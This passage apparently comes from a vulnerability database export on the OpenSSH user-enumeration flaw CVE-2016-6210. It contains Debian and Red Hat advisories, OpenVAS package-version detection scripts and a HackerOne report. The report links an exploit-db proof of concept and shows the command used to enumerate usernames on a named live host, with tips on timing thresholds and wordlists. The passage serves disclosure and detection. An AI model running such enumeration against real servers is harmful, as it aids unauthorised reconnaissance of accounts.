---------------------------------------------------------------\n", "edition": 9, "modified": "2016-07-30T21:41:01", "published": "2016-07-30T21:41:01", "id": "DEBIAN:DLA-578-1:0E24B", "href": "https://lists.debian.org/debian-lts-announce/2016/debian-lts-announce-201607/msg00039.html", "title": "[SECURITY] [DLA 578-1] openssh security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-08-12T01:03:25", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3626-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 24, 2016 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : openssh\nCVE ID : CVE-2016-6210\nDebian Bug : 831902\n\nEddie Harari reported that the OpenSSH SSH daemon allows user\nenumeration through timing differences when trying to authenticate\nusers. When sshd tries to authenticate a non-existing user, it will pick\nup a fixed fake password structure with a hash based on the Blowfish\nalgorithm. 
If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2016-07-24T09:19:36", "published": "2016-07-24T09:19:36", "id": "DEBIAN:DSA-3626-1:F9FBB", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00204.html", "title": "[SECURITY] [DSA 3626-1] openssh security update", "type": "debian", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:18", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. 
(CVE-2016-6210)", "modified": "2018-06-07T18:23:03", "published": "2017-08-31T17:09:34", "id": "RHSA-2017:2563", "href": "https://access.redhat.com/errata/RHSA-2017:2563", "type": "redhat", "title": "(RHSA-2017:2563) Moderate: openssh security update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-11T13:33:23", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10009", "CVE-2016-10011", "CVE-2016-10012", "CVE-2016-10708", "CVE-2016-6210", "CVE-2016-6515"], "description": "OpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. 
(CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.", "modified": "2018-04-12T03:33:13", "published": "2017-08-01T09:57:17", "id": "RHSA-2017:2029", "href": "https://access.redhat.com/errata/RHSA-2017:2029", "type": "redhat", "title": "(RHSA-2017:2029) Moderate: openssh security, bug fix, and enhancement update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "hackerone": [{"lastseen": "2020-03-06T19:23:38", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2016-6210"], "description": "**summary:**\nA vulnerability classified as problematic has been found in OpenSSH 7.2p2. check (INFO.png)Affected is an unknown function of the component Authentication. The manipulation of the argument Password with an unknown input leads to a information disclosure vulnerability (Username). CWE is classifying the issue as CWE-200. This is going to have an impact on confidentiality.\nThe weakness was disclosed 07/14/2016 by Eddie Harari as opensshd - user enumeration as confirmed mailinglist post (Full-Disclosure). The advisory is available at seclists.org. The vendor was not involved in the coordination of the public release. This vulnerability is traded as CVE-2016-6210 since 07/13/2016. It is possible to launch the attack remotely. The exploitation doesn't require any form of authentication. Technical details and a public exploit are known.\n\n**POC**\ndownload POC.py and write the next command. 
(you can try with any word-list or just use some random names like I did)\n- LINK: https://www.exploit-db.com/exploits/40136\n- CODE: python\nCommand:\npython POC.py newsletter.nextcloud.com -U usernames.txt\n\nOUTPUT:\ncheck (POC.png)\n\nin this case user whose time < 0.04717744470807732 is non existing user\nI tried with a small usernames list for POC, attacker will use a big list like rockyou.txt that on Kali Linux by default.\n\n## Impact\n\nAllows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.", "modified": "2020-03-01T11:00:36", "published": "2019-01-08T09:59:42", "id": "H1:476439", "href": "https://hackerone.com/reports/476439", "type": "hackerone", "title": "Nextcloud: Password authentication at newsletter.nextcloud.com discloses username list", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:35:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808936", "type": "openvas", "title": "Fedora Update for openssh FEDORA-2016-7440fa5ce2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for openssh FEDORA-2016-7440fa5ce2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty 
of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808936\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:54:54 +0530 (Tue, 02 Aug 2016)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for openssh FEDORA-2016-7440fa5ce2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"openssh on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7440fa5ce2\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/63LLZJD4MOKC26TFJIDXRWFT33ICG6PR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", 
re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~7.2p2~10.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:55:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Eddie Harari reported that the OpenSSH\nSSH daemon allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.", "modified": "2017-07-07T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:703626", "href": "http://plugins.openvas.org/nasl.php?oid=703626", "type": "openvas", "title": "Debian Security Advisory DSA 3626-1 (openssh - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3626.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3626-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your 
option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703626);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6210\");\n script_name(\"Debian Security Advisory DSA 3626-1 (openssh - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-02 10:55:52 +0530 (Tue, 02 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3626.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"openssh on Debian Linux\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 1:6.7p1-5+deb8u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1:7.2p2-6.\n\nWe recommend that you upgrade your openssh packages.\");\n script_tag(name: \"summary\", value: \"Eddie Harari reported that the OpenSSH\nSSH daemon 
allows user enumeration through timing differences when trying to\nauthenticate users. When sshd tries to authenticate a non-existing user, it will\npick up a fixed fake password structure with a hash based on the Blowfish\nalgorithm. If real users passwords are hashed using SHA256/SHA512, then\na remote attacker can take advantage of this flaw by sending large\npasswords, receiving shorter response times from the server for\nnon-existing users.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"openssh-client\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-server\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"openssh-sftp-server\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-askpass-gnome\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ssh-krb5\", ver:\"1:6.7p1-5+deb8u3\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "Check the version of openssh", "modified": "2019-03-08T00:00:00", "published": "2017-09-01T00:00:00", "id": "OPENVAS:1361412562310882763", "href": 
"http://plugins.openvas.org/nasl.php?oid=1361412562310882763", "type": "openvas", "title": "CentOS Update for openssh CESA-2017:2563 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_2563_openssh_centos6.nasl 14058 2019-03-08 13:25:52Z cfischer $\n#\n# CentOS Update for openssh CESA-2017:2563 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882763\");\n script_version(\"$Revision: 14058 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 06:53:41 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for openssh CESA-2017:2563 centos6\");\n script_tag(name:\"summary\", value:\"Check the version of openssh\");\n script_tag(name:\"vuldetect\", 
value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\nsupported by a number of Linux, UNIX, and similar operating systems. It includes\nthe core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n * A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated attacker\ncould possibly use this flaw to determine valid user names by measuring the\ntiming of server responses. (CVE-2016-6210)\");\n script_tag(name:\"affected\", value:\"openssh on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"CESA\", value:\"2017:2563\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2017-August/022529.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-ldap\", 
rpm:\"openssh-ldap~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~5.3p1~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"pam_ssh_agent_auth\", rpm:\"pam_ssh_agent_auth~0.9.3~123.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:34:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-09-01T00:00:00", "id": "OPENVAS:1361412562310811729", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811729", "type": "openvas", "title": "RedHat Update for openssh RHSA-2017:2563-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_2563-01_openssh.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for openssh RHSA-2017:2563-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811729\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 06:52:40 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for openssh RHSA-2017:2563-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openssh'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"OpenSSH is an SSH protocol implementation\nsupported by a number of Linux, UNIX, and similar operating systems. It includes\nthe core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n * A covert timing channel flaw was found in the way OpenSSH handled\nauthentication of non-existent users. A remote unauthenticated attacker\ncould possibly use this flaw to determine valid user names by measuring the\ntiming of server responses. (CVE-2016-6210)\");\n script_tag(name:\"affected\", value:\"openssh on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:2563-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-August/msg00086.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-debuginfo\", rpm:\"openssh-debuginfo~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openssh-server\", rpm:\"openssh-server~5.3p1~123.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:33:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": 
"OPENVAS:1361412562311220171189", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171189", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1189)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1189\");\n script_version(\"2020-01-23T10:57:17+0000\");\n script_cve_id(\"CVE-2016-6210\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:57:17 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:57:17 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1189)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", 
\"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1189\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1189\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'openssh' package(s) announced via the EulerOS-SA-2017-1189 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\");\n\n script_tag(name:\"affected\", value:\"'openssh' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh\", rpm:\"openssh~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-askpass\", rpm:\"openssh-askpass~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-clients\", rpm:\"openssh-clients~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-keycat\", rpm:\"openssh-keycat~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"openssh-server\", 
rpm:\"openssh-server~6.6.1p1~28.h13\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-27T18:38:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6210"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171190", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for openssh (EulerOS-SA-2017-1190)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
